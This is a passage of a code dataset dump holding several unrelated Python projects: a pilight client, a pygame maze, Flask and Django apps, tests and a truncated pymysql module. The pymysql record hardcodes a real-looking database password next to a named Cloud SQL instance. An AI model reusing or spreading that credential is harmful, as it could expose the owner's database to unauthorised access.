client to interface the pilight-daemon.\n\nMore information about pilight is here: https://www.pilight.org/.\n\"\"\"\n\nimport threading\nimport socket\nimport json\nimport logging\nimport time\n\n\nclass Client(threading.Thread):\n\n \"\"\"This client interfaces with the pilight-daemon (https://www.pilight.org/).\n\n Sending and receiving codes is implemented in an asychronous way.\n A callback function can be defined that reacts on received data.\n\n All pilight-send commands can be used by this client. Documentation\n can be found here https://wiki.pilight.org/doku.php/psend.\n Also check https://manual.pilight.org/en/api.\n\n :param host: Address where the pilight-daemon intance runs\n :param port: Port of the pilight-daemon on the host\n :param timeout: Time until a time out exception is raised when connecting\n :param recv_ident: The identification of the receiver to sucribe\n to the pilight-daemon topics (https://manual.pilight.org/en/api)\n :param recv_codes_only: If True: only call the callback function when the\n pilight-daemon received a code, not for status messages etc.\n :param veto_repeats: If True: only call the callback function when the\n pilight-daemon received a new code, not the same code repeated.\n Repeated codes happen quickly when a button is pressed.\n \"\"\"\n\n # pylint: disable=too-many-arguments, too-many-instance-attributes\n\n # How many seconds to wait before trying to reconnect\n RECONNECT_WAIT_SEC = 1\n\n def __init__(self, host='127.0.0.1', port=5000, timeout=1,\n recv_ident=None, recv_codes_only=True, veto_repeats=True):\n \"\"\"Initialize the pilight client.\n\n The readout thread is not started automatically.\n \"\"\"\n threading.Thread.__init__(self)\n self.daemon = True\n self._stop_thread = threading.Event()\n self._lock = threading.Lock()\n self.recv_ident = recv_ident\n self.recv_codes_only = recv_codes_only\n self.veto_repeats = veto_repeats\n\n self.host = host\n self.port = port\n self.timeout = timeout\n\n # Open 2 socket connections, one for sending one for receiving data\n # That is the simplest approach to allow asynchronus communication with\n # the pilight daemon\n self.connect_sender()\n self.connect_receiver()\n\n # Timeout to allow receiver thread termination and to restrict blocking\n # connection time\n self.callback = None\n\n def connect_receiver(self):\n if self.recv_ident:\n client_identification_receiver = self.recv_ident\n else:\n client_identification_receiver = {\n \"action\": \"identify\",\n \"options\": {\n \"core\": 0, # To get CPU load and RAM of pilight daemon\n # To receive the RF data received by pilight\n \"receiver\": 1,\n \"config\": 0,\n \"forward\": 0\n }\n }\n\n self.receive_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.receive_socket.settimeout(self.timeout)\n self.receive_socket.connect((self.host, self.port))\n # Identify this clients sockets at the pilight-deamon\n self.receive_socket.send(\n json.dumps(client_identification_receiver).encode())\n answer = json.loads(self.receive_socket.recv(1024).decode())\n # Check connections are acknowledged\n if ('success' not in answer['status']):\n raise IOError(\n 'Connection to the pilight daemon failed. 
Reply %s',\n answer)\n\n def connect_sender(self):\n # Identify client (https://manual.pilight.org/en/api)\n client_identification_sender = {\n \"action\": \"identify\",\n \"options\": {\n # To get CPU load and RAM of pilight daemon; it is nevertheless\n # ignored by the daemon ...\n \"core\": 0,\n \"receiver\": 0, # To receive the RF data received by pilight\n \"config\": 0\n }\n }\n\n self.send_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.send_socket.settimeout(self.timeout)\n self.send_socket.connect((self.host, self.port))\n self.send_socket.send(\n json.dumps(client_identification_sender).encode())\n answer = json.loads(self.send_socket.recv(1024).decode())\n if ('success' not in answer['status']):\n raise IOError(\n 'Connection to the pilight daemon failed. Reply %s',\n answer)\n\n \n def set_callback(self, function):\n \"\"\"Function to be called when data is received.\"\"\"\n self.callback = function\n\n def stop(self):\n \"\"\"Called to stop the receiver thread.\"\"\"\n self._stop_thread.set()\n # If you want to close the connection in a timely fashion,\n # call shutdown() before close().\n with self._lock: # Receive thread might use the socket\n self.receive_socket.shutdown(socket.SHUT_RDWR)\n self.receive_socket.close()\n\n self.send_socket.shutdown(socket.SHUT_RDWR)\n self.send_socket.close()\n\n def run(self):\n # \"Watchdog\" thread\n watchdog_thread = threading.Thread(target=self._watchdog, name=\"watchdog\")\n try:\n watchdog_thread.start()\n self._run()\n finally:\n self._stop_thread.set()\n watchdog_thread.join()\n return 0\n\n def try_sendall_with_reconnect(self, message):\n try:\n self.send_socket.sendall(message)\n except socket.error:\n time.sleep(self.RECONNECT_WAIT_SEC)\n self.connect_sender()\n self.send_socket.send(message)\n\n def _watchdog(self):\n # check pilight connection every 100ms\n while True:\n time.sleep(0.100)\n self.try_sendall_with_reconnect('HEART\\n'.encode())\n answer = self.send_socket.recv(1024).decode()\n if not (answer.startswith('BEAT')):\n logging.debug('Heartbeat lost, reconnecting...')\n time.sleep(self.RECONNECT_WAIT_SEC)\n self.connect_sender()\n self.connect_receiver()\n\n def _run(self): # Thread for receiving data from pilight\n \"\"\"Receiver thread function called on Client.start().\"\"\"\n logging.debug('Pilight receiver thread started')\n if not self.callback:\n raise RuntimeError('No callback function set, cancel readout thread')\n\n def handle_messages(messages):\n \"\"\"Call callback on each received message.\"\"\"\n for message in messages: # Loop over received messages\n if message: # Can be empty due to splitlines\n message_dict = json.loads(message.decode())\n if self.recv_codes_only:\n # Filter: Only use receiver messages\n if 'receiver' in message_dict['origin']:\n if self.veto_repeats:\n if message_dict['repeats'] == 1:\n self.callback(message_dict)\n else:\n self.callback(message_dict)\n else:\n self.callback(message_dict)\n\n while not self._stop_thread.is_set():\n try: # Read socket in a non-blocking call and interpret data\n # Sometimes more than one JSON object is in the stream thus\n # split at \\n\n with self._lock:\n messages = self.receive_socket.recv(1024).splitlines()\n handle_messages(messages)\n # FIXME handle lost connection -> reconnect\n except (socket.timeout, ValueError): # No data\n pass\n logging.debug('Pilight receiver thread stopped')\n\n def send_code(self, data, acknowledge=True):\n \"\"\"Send an RF code known to the pilight-daemon.\n\n For protocols look at
https://manual.pilight.org/en/api.\n When acknowledge is set, it is checked if the code was issued.\n :param data: Dictionary with the data\n :param acknowledge: Raise IO exception if the code is not\n sent by the pilight-daemon\n \"\"\"\n if \"protocol\" not in data:\n raise ValueError(\n 'Pilight data to send does not contain a protocol info. '\n 'Check the pilight-send docs!', str(data))\n\n # Create message to send\n message = {\n \"action\": \"send\", # Tell pilight daemon to send the data\n \"code\": data,\n }\n\n # If connection is closed IOError is raised\n self.try_sendall_with_reconnect(json.dumps(message).encode())\n \n if acknowledge: # Check if command is acknowledged by pilight daemon\n messages = self.send_socket.recv(1024).splitlines()\n received = False\n for message in messages: # Loop over received messages\n if message: # Can be empty due to splitlines\n acknowledge_message = json.loads(message.decode())\n # Filter correct message\n if ('status' in acknowledge_message and\n acknowledge_message['status'] == 'success'):\n received = True\n if not received:\n raise IOError('Send code failed. Code: %s', str(data))\n","repo_name":"DavidLP/pilight","sub_path":"pilight/pilight.py","file_name":"pilight.py","file_ext":"py","file_size_in_byte":9555,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"}
+{"seq_id":"9668259650","text":"# Create the list called \"Array\"\nArray = []\n\n# Use the append function to add a value at the end of the list\nArray.append(\"Lissette\")\nArray.append(\"Francisco\")\n\n# Use the insert(position, value) function, where position is the index at which the item will be inserted and value is the item to insert\nArray.insert(2, \"Matias\")\n\n# Use the extend function to add more than one value at the end of the list\nArray.extend([\"Javier\",\"Carolina\",\"Alejandro\"])\n\nprint(Array)\n# To remove the item at the last position of the list\nArray.pop()\n\nprint(Array)\n# To remove the item at an exact position use pop(position)\n# where position is replaced by the index of the item to delete\nArray.pop(3)\nArray.pop(3)\n\n# To remove a specific item use remove(item)\n# where item is replaced by the item to delete\nArray.remove(\"Matias\")\n\n# Reverse the order of the list\nArray.reverse()\n\n# Sort the list's items in ascending order \nArray.sort()\n\n# Sort the list's items in descending order\nArray.sort(reverse=True)\n\n# To count how many times an item appears in the list use count(item)\n# where item is replaced by the item to look for\nprint(Array.count(\"Francisco\"))\n\n# To find the position of an item use the index(item) function\n# where item is replaced by the item whose position we want\nprint(Array.index(\"Lissette\"))\n\nprint(Array)\n\n# To concatenate two lists use the following syntax\nArray2 = Array + Array\nprint(Array2)\n\n","repo_name":"Matias-Gutierrez/practica-con-python","sub_path":"1°Semestre/Clase k/tuplas.py","file_name":"tuplas.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33594359797","text":"#!/usr/bin/env python3\n\nfrom dataset import Dataset, Camera\nimport cv2\nimport sys\nfrom argparse import ArgumentParser\nfrom test import test\n\n\ndef cli_callback(args):\n if not args.output and not args.plot and not args.camera:\n args.plot = True\n dataset = Dataset(\"./data\", args.dataset)\n if args.detector ==
\"FAST\":\n detector = cv2.FastFeatureDetector_create(threshold=25, nonmaxSuppression=True)\n elif args.detector == \"ORB\":\n detector = cv2.ORB_create()\n elif args.detector == \"SIFT\":\n detector = cv2.SIFT_create()\n test(dataset, detector, args.plot, args.camera, args.output)\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument(\n \"--dataset\", \"-d\", default=\"00\", help=\"dataset id (e.g. 00, 01, etc)\"\n )\n parser.add_argument(\n \"--detector\",\n \"-D\",\n default=\"FAST\",\n help=\"feature detector (FAST [default], ORB, SURF)\",\n )\n parser.add_argument(\"--output\", \"-o\", help=\"trajectory output file (PNG)\")\n parser.add_argument(\n \"--plot\", \"-p\", default=False, action=\"store_true\", help=\"plot the trajectory\"\n )\n parser.add_argument(\n \"--camera\", \"-c\", default=False, action=\"store_true\", help=\"show camera frames\"\n )\n\n parser.set_defaults(func=cli_callback)\n\n args = parser.parse_args()\n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"veracioux/monocular-vo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41263522834","text":"from pygame import *\n'''Необходимые классы'''\n#класс-родитель для спрайтов \nclass GameSprite(sprite.Sprite):\n #конструктор класса\n def __init__(self, player_image, x, y, speed, hero_size):\n super().__init__()\n \n # каждый спрайт должен хранить свойство image - изображение\n self.image = transform.scale(image.load(player_image), hero_size)\n self.speed = speed\n # каждый спрайт должен хранить свойство rect - прямоугольник, в который он вписан\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n def change_image(self, new_image, new_size):\n center = self.rect.center\n self.image = transform.scale(image.load(new_image), new_size)\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n def reset(self):\n window.blit(self.image, (self.rect.x, self.rect.y))\n#класс-наследник для спрайта-игрока (управляется стрелками)\nclass Player(GameSprite):\n def update(self):\n keys = key.get_pressed()\n x, y = self.rect.x, self.rect.y\n if keys[K_LEFT] and self.rect.x > 5:\n self.rect.x -= self.speed\n if keys[K_RIGHT] and self.rect.x < win_width - 80:\n self.rect.x += self.speed\n if keys[K_UP] and self.rect.y > 5:\n self.rect.y -= self.speed\n if keys[K_DOWN] and self.rect.y < win_height - 80:\n self.rect.y += self.speed\n if sprite.spritecollide(self, walls, dokill=False):\n self.rect.x, self.rect.y = x, y\n if keys[K_p]:\n print(\"x = \", self.rect.centerx, 'y = ', self.rect.centery)\n time.delay(500)\n#класс-наследник для спрайта-врага (перемещается сам)\nclass Enemy(GameSprite):\n def __init__(self, player_image, x, y, speed, hero_size, direction, left, right):\n super().__init__(player_image, x, y, speed, hero_size)\n self.direction = direction\n self.left = left\n self.right = right\n def update(self):\n if self.rect.x <= self.left:\n self.direction = \"right\"\n elif self.rect.x >= self.right:\n self.direction = \"left\"\n\n if self.direction == \"left\":\n self.rect.x -= self.speed\n else:\n self.rect.x += self.speed\n# класс для стен, особенность - изображение прямоугольник\nclass Wall(sprite.Sprite):\n def __init__(self, x, y, width, height):\n super().__init__()\n self.image = Surface((width, height))\n self.image.fill(GREEN)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = 
y\n\ninit()\n\n# Game scene:\nwin_width, win_height = 1600, 800\nwindow = display.set_mode((win_width, win_height))\ndisplay.set_caption(\"Maze\")\n\n# Create a background image scaled to the window size\nbackground = transform.scale(image.load(\"background.jpg\"), (win_width, win_height))\n\n# Game characters:\nhero_size = 60, 60\nplayer = Player('hero.png', x=5, y=win_height - 80, speed=4, hero_size=hero_size)\nmonsters = sprite.Group()\nmonsters.add(Enemy('cyborg.png', x=1460 - 80, y=280, speed=2 , hero_size=hero_size,\n direction='left', left=470, right=1460 - 80))\nmonsters.add(Enemy('cyborg.png', x=900, y=450, speed=2 , hero_size=hero_size,\n direction='left', left=470, right=900))\nfinal = GameSprite('treasure.png', x=win_width - 120, y=win_height - 80,\n speed=0 , hero_size=hero_size)\n\n# Walls\nGREEN = (20, 230, 20)\nwalls = sprite.Group()\nwalls.add(Wall(x=80, y=100, width=520, height=10))\nwalls.add(Wall(x=460, y=100, width=10, height=400))\nwalls.add(Wall(x=1080, y=100, width=520, height=10))\nwalls.add(Wall(x=1460, y=100, width=10, height=400))\nwalls.add(Wall(x=580, y=400, width=520, height=10))\nwalls.add(Wall(x=960, y=400, width=10, height=400))\nwalls.add(Wall(x=250, y=300, width=200, height=10))\n\n# music\nmixer.init()\nmixer.music.load('jungles.ogg')\nmixer.music.set_volume(0.3)\nmixer.music.play()\n\n# variables that control the game loop\ngame = True\nfinish = False\nclock = time.Clock()\nFPS = 60 # screen refresh rate in frames per second\nwhile game:\n for e in event.get():\n if e.type == QUIT:\n game = False\n \n if finish != True:\n window.blit(background,(0, 0))\n walls.draw(window)\n player.update()\n monsters.update()\n final.reset() \n monsters.draw(window)\n player.reset()\n \n display.update()\n clock.tick(FPS)","repo_name":"Pavel-Bylkov/lessons","sub_path":"algo/PyGameStart/labirint/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"28003746250","text":"from django.template import loader, RequestContext\n\nfrom plugins.disqus import plugin_settings\nfrom utils import models, setting_handler\n\n\ndef inject_disqus(context):\n request = context.get('request')\n plugin = models.Plugin.objects.get(name=plugin_settings.SHORT_NAME)\n disqus_shortname = setting_handler.get_plugin_setting(plugin, 'disqus_shortname', request.journal)\n disqus_enabled = setting_handler.get_plugin_setting(plugin, 'disqus_enabled', request.journal)\n\n if not disqus_enabled.value:\n return\n\n template = loader.get_template('disqus/inject.html')\n disqus_context = {'disqus_shortname': disqus_shortname.processed_value}\n html_content = template.render(disqus_context)\n\n return html_content\n","repo_name":"BirkbeckCTP/disqus","sub_path":"hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13000610193","text":"import focus_stack\r\nimport unittest\r\nimport os\r\nimport json\r\n\r\nTESTDATA_FILENAME = os.path.join(os.path.dirname(__file__), 'test_metadata.json')\r\n\r\n# Configuration to produce expected stacks from the test data\r\nTEST_CONFIG = {\r\n 'timestamp_threshold_sec': '0.5',\r\n 'continuous_drive': '0',\r\n 'min_stack_size': '2'\r\n}\r\n\r\nEXPECTED_STACKS = [\r\n \"2023-08-13_18-09-33__IMG_8783-IMG_8882__100\",\r\n \"2023-08-13_18-10-17__IMG_8883-IMG_8982__100\",\r\n \"2023-08-13_18-12-46__IMG_8983-IMG_9002__020\",\r\n
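# label format, inferred from the fixtures: start date-time, first and last image name, zero-padded stack size\r\n 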
\"2023-08-13_18-13-26__IMG_9003-IMG_9062__060\",\r\n \"2023-08-13_18-14-15__IMG_9063-IMG_9122__060\",\r\n \"2023-08-13_18-19-17__IMG_9127-IMG_9136__010\",\r\n \"2023-08-13_18-20-14__IMG_9137-IMG_9146__010\"\r\n]\r\n\r\nclass TestFocusStack(unittest.TestCase):\r\n\r\n def setUp(self):\r\n self.testfile = open(TESTDATA_FILENAME)\r\n self.testdata = json.load(self.testfile)\r\n\r\n def tearDown(self):\r\n self.testfile.close()\r\n\r\n \"\"\"\r\n Test focus stack search\r\n \"\"\"\r\n def test_search_stacks(self):\r\n stacks = focus_stack.search(self.testdata, TEST_CONFIG[\"timestamp_threshold_sec\"], TEST_CONFIG[\"continuous_drive\"], TEST_CONFIG[\"min_stack_size\"] )\r\n self.assertEqual(len(stacks), 7)\r\n stack_labels = [focus_stack.get_stack_label(s) for s in stacks]\r\n self.assertListEqual(stack_labels, EXPECTED_STACKS)\r\nif __name__ == '__main__':\r\n unittest.main()","repo_name":"rkelkka/stackfinder","sub_path":"tests/test_focus_stack.py","file_name":"test_focus_stack.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32408102085","text":"import flask\nimport json\nfrom flask import Flask, render_template, jsonify, request\nimport pymongo\nimport time\n\n\n# To run the program: FLASK_APP=main.py flask run\n\napp = Flask(__name__)\nclient = pymongo.MongoClient()\nrepo = client.repo\nrepo.authenticate('cyyan_liuzirui_yjunchoi_yzhang71', 'cyyan_liuzirui_yjunchoi_yzhang71')\n\n@app.route('/')\ndef hello():\n return render_template('home.html')\n\n@app.route('/marker')\ndef getMarker():\n marker = json.load(open('latlng.json', 'r'))\n return jsonify(marker)\n\n@app.route('/map', methods = ['POST'])\ndef map():\n wardname = request.form.get('ward')\n drop = request.form.get('dropdown')\n\n l = []\n loc = []\n dLoc = {}\n\n if drop == 'Original':\n pLocation = repo['cyyan_liuzirui_yjunchoi_yzhang71.pollingLocation'].find()\n if wardname == \"All\":\n for p in pLocation:\n for i in range(len(p['coordinates'])):\n l = [p['coordinates'][i][1], p['coordinates'][i][0]]\n loc.append(l)\n else:\n for p in pLocation:\n if p['Ward'] == int(wardname):\n for i in range(len(p['coordinates'])):\n l = [p['coordinates'][i][1], p['coordinates'][i][0]]\n loc.append(l)\n elif drop == 'Transit':\n public = repo['cyyan_liuzirui_yjunchoi_yzhang71.optByPublicT'].find()\n dLoc[0] = public[0]\n if wardname == \"All\":\n for i in range(1, len(public[0])):\n for o in dLoc[0][str(i)]:\n l = [o[1], o[0]]\n loc.append(l)\n else:\n for o in dLoc[0][wardname]:\n l = [o[1], o[0]]\n loc.append(l)\n elif drop == \"MBTA\":\n public = repo['cyyan_liuzirui_yjunchoi_yzhang71.optByMBTA'].find()\n dLoc[0] = public[0]\n if wardname == \"All\":\n for i in range(1, len(public[0])):\n for o in dLoc[0][str(i)]:\n l = [o[1], o[0]]\n loc.append(l)\n else:\n for o in dLoc[0][wardname]:\n l = [o[1], o[0]]\n loc.append(l)\n elif drop == \"BUS\":\n public = repo['cyyan_liuzirui_yjunchoi_yzhang71.optByBusstop'].find()\n dLoc[0] = public[0]\n if wardname == \"All\":\n for i in range(1, len(public[0])):\n for o in dLoc[0][str(i)]:\n l = [o[1], o[0]]\n loc.append(l)\n else:\n for o in dLoc[0][wardname]:\n l = [o[1], o[0]]\n loc.append(l)\n else:\n print('Something wrong with dropdown')\n\n result = {}\n\n for i in range(len(loc)):\n result[str(i)] = loc[i]\n\n with open('latlng.json', 'w') as makeFile:\n json.dump(result, makeFile)\n\n marker = getMarker()\n time.sleep(0.2)\n return render_template('map.html')\n\n\n@app.route('/score', 
methods = ['GET', 'POST'])\ndef score_board():\n if request.method == 'POST':\n drop1 = request.form.get('dropdown1')\n drop2 = request.form.get('dropdown2')\n print(\"this is drop1\", drop1)\n print(\"this is drop2\", drop2)\n\n NewDrop1 = score_drop(drop1)\n NewDrop2 = score_drop(drop2)\n\n if NewDrop1 == \"error\" or NewDrop2 == \"error\":\n print('Something wrong with dropdown')\n\n #Converted latlng to miles\n scoring = []\n scoring.append({\"Mean\":1.035, \"STDDEV\":0.828, \"lowCI95\":0.069, \"upperCI95\":2.967})\n scoring.append({\"Mean\":0.828, \"STDDEV\":0.690, \"lowCI95\":0.069, \"upperCI95\":2.553})\n scoring.append({\"Mean\":0.966, \"STDDEV\":0.828, \"lowCI95\":0.069, \"upperCI95\":2.829})\n scoring.append({\"Mean\":0.828, \"STDDEV\":0.690, \"lowCI95\":0.069, \"upperCI95\":2.484})\n\n s = [[], []]\n s[0] = dict_to_list(scoring[NewDrop1], drop1)\n s[1] = dict_to_list(scoring[NewDrop2], drop2)\n return render_template('score.html', message = s)\n\n else:\n return render_template('score.html')\n\ndef score_drop(drop):\n if drop == \"Original\":\n return 0\n elif drop == \"Transit\":\n return 1\n elif drop == \"MBTA\":\n return 2\n elif drop == \"BUS\":\n return 3\n else:\n return \"error\"\n\ndef dict_to_list(dic, id):\n l = []\n l.append(id)\n l.append(dic['Mean'])\n l.append(dic['STDDEV'])\n l.append(dic['lowCI95'])\n l.append(dic['upperCI95'])\n return l\n\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"data-mechanics/course-2017-fal-proj","sub_path":"cyyan_liuzirui_yjunchoi_yzhang71/visualization/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24879319317","text":"from flask import Flask, send_from_directory\nfrom flask_restful import Api, Resource, reqparse\nfrom flask_cors import CORS #comment this on deployment\n# from FirebaseApiHandler import *\nfrom SpreadsheetApiHandler import *\n#MAKE SURE ONLY ONE ApiHandler is uncommented\n\napp = Flask(__name__, static_url_path='', static_folder='frontend/build') # should i change this?\nCORS(app) #comment this on deployment\napi = Api(app)\n\n@app.route(\"/\", defaults={'path':''})\ndef serve(path):\n return send_from_directory(app.static_folder,'index.html')\n\n\"\"\"\nFirebaseApiHandler Urls\n\"\"\"\n# api.add_resource(TimeSeriesApiHandler, '/firebase///')\n# api.add_resource(ImageApiHandler, '/firebase/images')\n# api.add_resource(DataApiHandler, '/firebase//')\n# api.add_resource(AveragesHandler, '/firebase/averages///')\n# api.add_resource(VelocityHandler, '/firebase/velocity///')\n# api.add_resource(PositionHandler, '/firebase/position///')\n# api.add_resource(FourierTransformHandler, '/firebase/fouriertransform//')\n\n# api.add_resource(PitchesHandler, '/firebase/pitches//')\n# api.add_resource(AnglesHandler, '/firebase/angles//')\n# api.add_resource(FrequencyHandler, '/firebase/frequency//')\n# api.add_resource(AmplitudeHandler, '/firebase/amplitude//')\n# api.add_resource(SideBiasHandler, '/firebase/sidebias//')\n# api.add_resource(MoodHandler, '/firebase/mood//')\n# api.add_resource(HappyPhotoHandler, '/firebase/happyphoto//')\n# api.add_resource(SpreadsheetHandler, '/firebase/spreedsheet/')\n\n\"\"\"\nSpreedSheetApiHandler Urls\n\"\"\"\napi.add_resource(PitchesHandler, '/spreadsheet/pitches/')\napi.add_resource(AnglesHandler, '/spreadsheet/angles/')\napi.add_resource(FrequencyHandler, '/spreadsheet/frequency/')\napi.add_resource(AmplitudeHandler, 
'/spreadsheet/amplitude/')\napi.add_resource(SideBiasHandler, '/spreadsheet/sidebias/')\napi.add_resource(MoodHandler, '/spreadsheet/mood/')\napi.add_resource(HappyPhotoHandler, '/spreadsheet/happyphoto/')\n","repo_name":"bmw54/woofwoofwearables","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2278872747","text":"import csv\nimport io\nimport os\nimport pickle\nimport sys\nimport cv2\nimport time\nimport tempfile\nimport numpy as np\n\nfrom wrappers.face_classification import fc_face_attributes\nfrom wrappers.ms import ms_face_attributes\n\nTEST_SIZE = 1000\nHISTORY_FILE = 'fre2013_test.pickle'\n\nif __name__ == '__main__':\n\n i = predicted = 0\n\n if not os.path.exists(HISTORY_FILE):\n history = []\n else:\n history = pickle.load(open(HISTORY_FILE, 'rb'))\n\n for row in csv.DictReader(open('data/fer2013.csv')):\n if row['Usage'] != 'PublicTest':\n continue\n i += 1\n if i >= TEST_SIZE:\n break\n if len(history) >= i:\n predicted += history[i-1]\n else:\n img_file = io.BytesIO(bytearray(map(int, row['pixels'].strip().split(' '))))\n tmp_img_path = os.path.join(tempfile.gettempdir(), 'afacefer2013.png')\n image = np.asarray(row['pixels'].strip().split(' '), dtype=np.uint8).reshape((48, 48, 1))\n cv2.imwrite(tmp_img_path, image)\n # ret1 = fc_face_attributes(tmp_img_path)\n ret2 = ms_face_attributes(tmp_img_path)\n print('ms', ret2)\n if ret2 and int(row['emotion']) == ret2['emotion']:\n predicted += 1\n history.append(1)\n else:\n history.append(0)\n pickle.dump(history, open(HISTORY_FILE, 'wb'))\n time.sleep(5)\n\n print(f'{predicted/i:.0%} ({i})')\n # cv2.imshow('img', image)\n # cv2.waitKey(0)\n #print('fc', ret1)\n\n #\n #\n # for i in range(48):\n # for j in range(48):\n # px = int(pxs[i*48 + j])\n # image[i][j] = px\n # print(type(image), image.shape, image)\n # #img = cv2.imdecode(image, cv2.IMREAD_GRAYSCALE)\n # cv2.imshow('img', image)\n # cv2.imwrite('test.png', image)\n # cv2.waitKey(0)\n # print(row)\n # break\n","repo_name":"sheh/ml-meetups","sub_path":"180801/faceapi/fer2013_test.py","file_name":"fer2013_test.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70203252995","text":"from django.db import models\nfrom django.db.models import Count, Q, F\n\nfrom common.date_utils import get_today_date\nfrom user.models import User\n\n\nclass Objective(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, null=False)\n objective_text = models.TextField(null=False)\n\n def __str__(self):\n return self.objective_text\n\n class Meta:\n db_table = \"objective\"\n\n @staticmethod\n def get_on_track_summary():\n from key_result.models import KeyResult\n\n result = Objective.objects.filter(user__team__isnull=False).aggregate(\n total_count=Count('pk', distinct=True),\n not_on_track_count=Count('pk', filter=Q(keyresult__status=KeyResult.StatusChoice.IN_PROGRESS,\n keyresult__due_date__lt=get_today_date()))\n )\n\n return result\n\n @staticmethod\n def get_on_track_dept_wise_summary():\n from key_result.models import KeyResult\n\n result_list = Objective.objects.filter(user__team__isnull=False).values(\n department_name=F('user__team__department__name')).annotate(\n total_count=Count('pk', distinct=True),\n not_on_track_count=Count(\n 'pk', filter=Q(keyresult__status=KeyResult.StatusChoice.IN_PROGRESS,\n 
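# 'not on track' = key results still in progress whose due date has already passed\n 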
keyresult__due_date__lt=get_today_date()), distinct=True),\n users_count=Count('user__id', distinct=True),\n department_id=F('user__team__department__id')\n )\n\n return list(result_list)\n\n @staticmethod\n def get_on_track_team_wise_summary_for_a_dept(department_id):\n from key_result.models import KeyResult\n\n result_list = Objective.objects.filter(\n user__team__isnull=False, user__team__department_id=department_id).values(\n team_id=F('user__team__id')).annotate(\n total_count=Count('pk', distinct=True),\n not_on_track_count=Count(\n 'pk', filter=Q(keyresult__status=KeyResult.StatusChoice.IN_PROGRESS,\n keyresult__due_date__lt=get_today_date()), distinct=True),\n team_lead_name=F('user__team__team_lead__first_name')\n )\n\n return list(result_list)\n","repo_name":"VimalParthan/betterworks_analytics","sub_path":"objective/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14482208323","text":"from .applier_frontend import applier_frontend\nfrom .appliers.control import control\nfrom util.logging import slogm\n\nimport logging\n\nclass control_applier(applier_frontend):\n _registry_branch = 'Software\\\\BaseALT\\\\Policies\\\\Control'\n\n def __init__(self, storage):\n self.storage = storage\n self.control_settings = self.storage.filter_hklm_entries('Software\\\\BaseALT\\\\Policies\\\\Control%')\n self.controls = list()\n\n def apply(self):\n '''\n Trigger control facility invocation.\n '''\n for setting in self.control_settings:\n valuename = setting.hive_key.rpartition('\\\\')[2]\n try:\n self.controls.append(control(valuename, int(setting.data)))\n logging.info(slogm('Working with control {}'.format(valuename)))\n except Exception as exc:\n logging.info(slogm('Unable to work with control {}: {}'.format(valuename, exc)))\n #for e in polfile.pol_file.entries:\n # print('{}:{}:{}:{}:{}'.format(e.type, e.data, e.valuename, e.keyname))\n for cont in self.controls:\n cont.set_control_status()\n\n","repo_name":"ekorneechev/gpupdate","sub_path":"gpoa/frontend/control_applier.py","file_name":"control_applier.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"20516330245","text":"import pymysql\nfrom pymysql.err import OperationalError\nfrom schemas import Session, Action, Event\nfrom datetime import datetime\nfrom typing import Optional, List\n\npymysql_config = {\n 'user': 'cloudFunction',\n 'password': '$D>rj>!rr4?w6=V^Sa^z',\n 'db': 'sentinoodlev2',\n 'charset': 'utf8mb4',\n 'cursorclass': pymysql.cursors.DictCursor,\n 'autocommit': True\n}\n\nCONNECTION_NAME = 'sentinoodle:europe-west2:sentinoodle-events'\n\n# Create SQL connection globally to enable reuse\n# PyMySQL does not include support for connection pooling\nDB = None\n\n\ndef __get_cursor():\n \"\"\"\n Helper function to get a cursor.\n PyMySQL does NOT automatically reconnect, so we must reconnect explicitly using ping().\n \"\"\"\n try:\n return DB.cursor()\n except OperationalError:\n DB.ping(reconnect=True)\n return DB.cursor()\n\n\ndef ensure_db_connection():\n global DB\n\n if not DB:\n try:\n DB = pymysql.connect(**pymysql_config)\n except OperationalError:\n # If production settings fail, use local development ones\n pymysql_config['unix_socket'] = f'/cloudsql/{CONNECTION_NAME}'\n DB = pymysql.connect(**pymysql_config)\n\n\ndef insert_event_into_table(id: str, session_id: int, event_name: str, 
